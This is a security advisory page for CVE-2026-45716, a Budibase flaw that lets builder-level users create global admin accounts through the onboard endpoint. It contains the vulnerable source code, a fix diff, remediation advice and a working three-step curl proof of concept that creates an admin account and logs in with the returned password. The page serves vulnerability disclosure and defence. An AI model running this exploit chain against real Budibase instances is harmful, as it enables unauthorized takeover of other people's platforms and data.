Skip to main content

Budibase CVE-2026-45716

| EUVDEUVD-2026-32602 HIGH
Improper Privilege Management (CWE-269)
2026-05-18 https://github.com/Budibase/budibase GHSA-c54j-xp92-wh28
8.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
May 18, 2026 - 18:30 vuln.today
Analysis Generated
May 18, 2026 - 18:30 vuln.today

DescriptionGitHub Advisory

Summary

The POST /api/global/users/onboard endpoint is protected by workspaceBuilderOrAdmin middleware, allowing any user with builder permissions to access it. When SMTP email is not configured (the default for self-hosted Budibase instances), this endpoint bypasses the admin-restricted invite flow and directly creates users via bulkCreate, accepting arbitrary admin and builder role assignments from the request body. A builder-level user can create a new global admin account and receive the generated password in the response, achieving full privilege escalation.

Details

The vulnerability stems from a mismatch between the authorization level of the onboardUsers endpoint and the user-creation capabilities it exposes when SMTP is not configured.

Route definition (packages/worker/src/api/routes/global/users.ts:93-109):

typescript
builderOrAdminRoutes  // <-- allows builders, not just admins
  .post(
    "/api/global/users/onboard",
    buildInviteMultipleValidation(),
    controller.onboardUsers
  )

Compare with the invite and inviteMultiple endpoints which are correctly admin-only:

typescript
adminRoutes  // <-- admin only
  .post("/api/global/users/invite", buildInviteValidation(), controller.invite)
  .post("/api/global/users/multi/invite", buildInviteMultipleValidation(), controller.inviteMultiple)

Controller (packages/worker/src/api/controllers/global/users.ts:601-630):

typescript
export const onboardUsers = async (ctx) => {
  if (await isEmailConfigured()) {
    await inviteMultiple(ctx)  // admin-only path (delegates to invite flow)
    return
  }

  // No SMTP → directly create users with attacker-controlled roles
  const users = ctx.request.body.map(invite => {
    const password = generatePassword(12)
    createdPasswords[invite.email] = password
    return {
      email: invite.email,
      password,
      forceResetPassword: true,
      roles: invite.userInfo.apps || {},
      admin: { global: !!invite.userInfo.admin },  // <-- attacker-controlled
      builder: invite.userInfo.builder,              // <-- attacker-controlled
      tenantId: tenancy.getTenantId(),
    }
  })

  let resp = await userSdk.db.bulkCreate(users)
  for (const user of resp.successful) {
    user.password = createdPasswords[user.email]  // <-- password returned!
  }
  ctx.body = { ...resp, created: true }
}

Middleware pass-through (packages/backend-core/src/middleware/workspaceBuilderOrAdmin.ts:10-26):

In the worker context (env.isWorker() is true), when there is no workspaceId parameter in the request (which there isn't for the onboard endpoint), the middleware at line 19 checks !workspaceId && env.isWorker() - this is true, so it falls through to line 21 which only checks hasBuilderPermissions. Any global builder passes.

Validation gap (buildInviteMultipleValidation at line 37-45): The Joi schema validates userInfo as Joi.object().optional() with no constraints on its contents, so admin and builder fields pass through.

No downstream check: bulkCreate and buildUser do not strip or validate admin/builder fields - they are written directly to the user document in CouchDB.

PoC

Prerequisites: A self-hosted Budibase instance (default: no SMTP configured) and a user account with builder-level access.

Step 1: Authenticate as a builder user and obtain the session cookie:

bash
# Login as builder
curl -s -c cookies.txt -X POST 'http://localhost:10000/api/global/auth/default/login' \
  -H 'Content-Type: application/json' \
  -d '{"username":"builder@example.com","password":"builderpassword"}'

Step 2: Create a new global admin user via the onboard endpoint:

bash
curl -s -X POST 'http://localhost:10000/api/global/users/onboard' \
  -H 'Content-Type: application/json' \
  -b cookies.txt \
  -d '[{"email":"pwned-admin@attacker.com","userInfo":{"admin":{"global":true}}}]'

Expected response (includes the generated password):

json
{
  "successful": [{"email":"pwned-admin@attacker.com","password":"<generated-12-char-password>","admin":{"global":true},...}],
  "unsuccessful": [],
  "created": true
}

Step 3: Login as the new admin:

bash
curl -s -X POST 'http://localhost:10000/api/global/auth/default/login' \
  -H 'Content-Type: application/json' \
  -d '{"username":"pwned-admin@attacker.com","password":"<password-from-step-2>"}'

The attacker now has full global admin access.

Impact

  • Privilege escalation: Any builder-level user can escalate to global admin on self-hosted Budibase instances without SMTP configured (the default deployment).
  • Full platform compromise: Global admin can access all apps, all data sources, manage all users, delete apps, and modify platform configuration.
  • Credential exposure: The generated password is returned in the HTTP response, giving the attacker immediate access to the new admin account.
  • Stealth: The created user appears as a legitimately onboarded user, making detection difficult without audit log review.
  • Wide applicability: Self-hosted Budibase instances commonly run without SMTP configuration, making this the default-exploitable path.

Recommended Fix

Move the onboardUsers route from builderOrAdminRoutes to adminRoutes to match the authorization level of invite and inviteMultiple:

diff
--- a/packages/worker/src/api/routes/global/users.ts
+++ b/packages/worker/src/api/routes/global/users.ts
-builderOrAdminRoutes
+adminRoutes
   .post(
     "/api/global/users/onboard",
     buildInviteMultipleValidation(),
     controller.onboardUsers
   )

Additionally, the onboardUsers controller should validate that the caller has sufficient permissions to assign the requested role level. Even admin users should not be able to create users with roles exceeding their own. Consider adding explicit validation in the controller:

typescript
// In onboardUsers, before bulkCreate:
for (const invite of ctx.request.body) {
  if (invite.userInfo.admin && !ctx.user.admin?.global) {
    ctx.throw(403, "Only admins can create admin users")
  }
}

AnalysisAI

Privilege escalation in self-hosted Budibase (@budibase/worker < 3.38.1) allows any authenticated builder-level user to create a global admin account via the POST /api/global/users/onboard endpoint when SMTP is not configured, with the generated password returned directly in the HTTP response. The flaw stems from the onboard route being gated by builderOrAdmin middleware while exposing the same user-creation power as the admin-only invite endpoints, and no public exploit is identified at time of analysis although the GHSA advisory includes a complete, working proof-of-concept curl chain.

Technical ContextAI

Budibase is a Node.js/TypeScript low-code application platform; the affected component is the npm package @budibase/worker, which handles global user, tenant, and authentication APIs. The root cause is CWE-269 (Improper Privilege Management): the onboardUsers controller branches on isEmailConfigured() and, when SMTP is unset, calls userSdk.db.bulkCreate directly with attacker-controlled admin.global and builder fields from the request body. The buildInviteMultipleValidation Joi schema treats userInfo as an unconstrained optional object, and the workspaceBuilderOrAdmin middleware short-circuits to a builder-only check when no workspaceId is present in the worker context, so the privilege boundary that protects /invite and /multi/invite is absent on /onboard.

RemediationAI

Vendor-released patch: 3.38.1 - upgrade @budibase/worker (and the full Budibase stack) to 3.38.1 or later, per the release notes which include PR #18752 'Remove unused global user onboarding endpoint' (https://github.com/Budibase/budibase/releases/tag/3.38.1 and https://github.com/Budibase/budibase/security/advisories/GHSA-c54j-xp92-wh28). If immediate patching is not possible, block or reverse-proxy-deny POST requests to /api/global/users/onboard at an upstream proxy (nginx, Traefik, or a WAF), accepting that this disables the onboarding flow but has no impact on normal invite-based provisioning; alternatively, configure SMTP on the instance so the controller routes through the admin-only inviteMultiple path, with the trade-off that this requires a working mail relay and does not address the underlying authorization mismatch. Audit existing global admin accounts and recent user-creation activity for unexpected entries and rotate credentials for any suspicious admins, since the created users look legitimately onboarded.

Share

CVE-2026-45716 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy